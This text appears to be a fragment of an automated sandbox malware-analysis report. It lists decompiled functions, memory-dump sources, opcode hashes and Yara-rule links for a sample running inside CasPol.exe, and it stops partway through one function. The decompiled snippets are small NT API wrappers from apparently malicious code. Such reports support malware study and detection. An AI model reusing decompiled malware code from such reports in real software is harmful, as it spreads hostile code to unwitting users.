                                                                                                                                                                                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 825f434acf6dc6fd88ddf7bf396c15ddc8bafb9e63a449b8e66512176d976343
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F015B2200208ABCB14DF89DC81EEB77ADAF88754F018119BE0897241C630F911CBB4
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0041E6A3 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 144 41e6a3-41e6cc call 41f1e3 NtClose
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E6A3(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F1E3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                                                                                                                                                                                                                                            0x0041e6ba
                                                                                                                                                                                                                                                                                                                            0x0041e6c8
                                                                                                                                                                                                                                                                                                                            0x0041e6cc

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6C8
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cb1b7ae1c3de62a6f6389ea3faa402dc70b79968ee51811a0726bb4610d92ee9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87D01772604214BBD610EBA9DC89FD77BACDF48664F018469BA1C5B242C570FA0086E1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 012699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d4aa6107b8e78bb1da4b07bcc511ff5cb22f4cfab9dfee2323f2a24c23b6448f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bc490f00cc112b2c4aaf185cf968f1b7be64dcdee2a55dff41e9ebd262d2fff1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4aa6107b8e78bb1da4b07bcc511ff5cb22f4cfab9dfee2323f2a24c23b6448f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D29002A135100842E10061A94414B070005EBE1341F51C019E1055554DC669CC527266
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d2c5a59ee8260150c03eda237cf3370db0c89ed067720c34ff6b62f19c03d8c2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 130ad5f5b858fb3605baa7dce1576aa452ec6ec8ae494f1059b51da6f18f9e85
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2c5a59ee8260150c03eda237cf3370db0c89ed067720c34ff6b62f19c03d8c2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A90026161100442514071B988449074005BFE1251751C125A0989550DC5A9886567A5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 012697A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 89300f64350ad2c6cf4e5f5c62664d2f2911044a5e31fd2ae82ff13f41af4178
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d2061cc12b294ba83b1200f3605966cb6651a0c65861f0e84f71190602d4a7d4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89300f64350ad2c6cf4e5f5c62664d2f2911044a5e31fd2ae82ff13f41af4178
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1690026131100403E14071A954186074005FBE1341F51D015E0405554CD96588566362
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f703ea4755079d5f98400782d3dc72f7b29a9b8d2ef417f1552c6f3532553dba
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 992db08a7a4ea819de0a2c319243130a12a58c9e1afe532a4f4fa389061c9a5a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f703ea4755079d5f98400782d3dc72f7b29a9b8d2ef417f1552c6f3532553dba
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E390027121140802E10061A9481470B0005ABD0342F51C015A1155555DC675885176B1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 48b4988bf00e87aeca66ed31c8b4b9da21d175d9727dfaccebb1c72fbbdbb477
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 874b749f8a075cf32f42e21197e54460062e5715a5402ad74ca6c35fb61348fd
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48b4988bf00e87aeca66ed31c8b4b9da21d175d9727dfaccebb1c72fbbdbb477
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4790026922300402E18071A9540860B0005ABD1242F91D419A0006558CC96588696361
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 75fd7915af5fdb38a622e441fb076b3ffd15fcc0e128025ccfb41035c398dbb3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ce4ebb80e1cf122ae706ac409dc59cb9d6e03117157da523c44bac4babd7a394
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75fd7915af5fdb38a622e441fb076b3ffd15fcc0e128025ccfb41035c398dbb3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 629002B121100802E14071A944047470005ABD0341F51C015A5055554EC6A98DD577A5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 909907503830b46ee5f642be3fdb6ed4515b29f3de8616517c44b4cb80f10f68
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9b14762bb3c825c4fa25569f522aaee1a5748b5941d70435419745c60884510a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 909907503830b46ee5f642be3fdb6ed4515b29f3de8616517c44b4cb80f10f68
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF90027121100802E10065E954086470005ABE0341F51D015A5015555EC6B588917271
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5e03cdf232ea196f1f20b3fbed26ac265e7c2a59cf1625f03377f716f1030412
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 30281444b8cd05a7f9c0a10c892cec933f27b24b345d12ce3cd18abec7b42096
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e03cdf232ea196f1f20b3fbed26ac265e7c2a59cf1625f03377f716f1030412
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA90027121100813E11161A945047070009ABD0281F91C416A0415558DD6A68952B261
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 98d3125e80450fb5f10db2e597deb52058ceb341bcee0d2d617fdcecf4917517
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fe3b5a84be2b4eb9528a804de8da106bd13bb51af8a9198fe013e18c3447285f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98d3125e80450fb5f10db2e597deb52058ceb341bcee0d2d617fdcecf4917517
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9890027132114802E11061A984047070005ABD1241F51C415A0815558DC6E588917262
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7f68ede50a29cf001b01ee029a2ca7c6a244e119aa058efff6e6553e94bd6192
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2645d4c44dde926a173f86440304567503556f1f8a79cd135365742fcde86e60
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f68ede50a29cf001b01ee029a2ca7c6a244e119aa058efff6e6553e94bd6192
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B890027121100C02E18071A9440464B0005ABD1341F91C019A0016654DCA658A5977E1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 012696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9d9540b0ee249bf4edafac6d13d1fa0880876213ca2f89d2d231c9c57f390b80
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b415ab55dd24158c0a5a7ca7d8c9d74ce1d212dd48b460cf708be17fe8e5a103
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9540b0ee249bf4edafac6d13d1fa0880876213ca2f89d2d231c9c57f390b80
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B390027121108C02E11061A9840474B0005ABD0341F55C415A4415658DC6E588917261
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 012698F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a18cca18dff4c6f9da2a286d175cd8fce19cda1d38a2bb3f3ee30d82aee2a97e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 07287fe4ad312748ef8acf82e02e18210fc9c00888e8b201bb2681e0cede5080
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a18cca18dff4c6f9da2a286d175cd8fce19cda1d38a2bb3f3ee30d82aee2a97e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1590026161100902E10171A94404617000AABD0281F91C026A1015555ECA758992B271
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 98cebef24385fef777a7f7b86d733bb13c632daaef51e4770c6f0415590e1bdf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fe373d80ddcff43b70bb1a13dd1dcf6a257553f1cda8b0215e1815d31441bf62
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98cebef24385fef777a7f7b86d733bb13c632daaef51e4770c6f0415590e1bdf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10900261252045526545B1A944045074006BBE0281791C016A1405950CC5769856E761
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 154 1269540-126954c LdrInitializeThunk
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: abfe1c11938d33a9b510c0c95ae57aedafe7f87a1c1b1a546b08d5e5e0f9c603
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6b841331dc7b44067d059f8dcc15de11886d7305fd8d2e73ef8ff81ebf8d4326
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abfe1c11938d33a9b510c0c95ae57aedafe7f87a1c1b1a546b08d5e5e0f9c603
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7900265221004031105A5A907045070046ABD5391351C025F1006550CD67188616261
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01269A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a1bd76f0aed632939404a3ce0d2391dfa441b2bc6b444bcb82dc8080d0bb9f77
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bdd0c93f1f477849e613ceac78022844dd93627cb097abd5bbf8f37888437cd6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1bd76f0aed632939404a3ce0d2391dfa441b2bc6b444bcb82dc8080d0bb9f77
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0790026122180442E20065B94C14B070005ABD0343F51C119A0145554CC96588616661
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 012695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 155 12695d0-12695dc LdrInitializeThunk
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1e73a01d6a287bfbb2f0ed716e4d10650c58790d0664c0f2cd98a3059cfaaebd
                                                                                                                                                                                                                                                                                                                            • Instruction ID: aa0183c6a2eacb5a223d2e3d3946e6a54cbeb8b168b933dbd567b12e7e8f7c12
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e73a01d6a287bfbb2f0ed716e4d10650c58790d0664c0f2cd98a3059cfaaebd
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 649002A121200403510571A94414617400AABE0241B51C025E1005590DC57588917265
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 004098E3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                                                            			E004098E3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E004201B3( &_v67, 0, 0x3f);
				E00420C63( &_v68, 3);
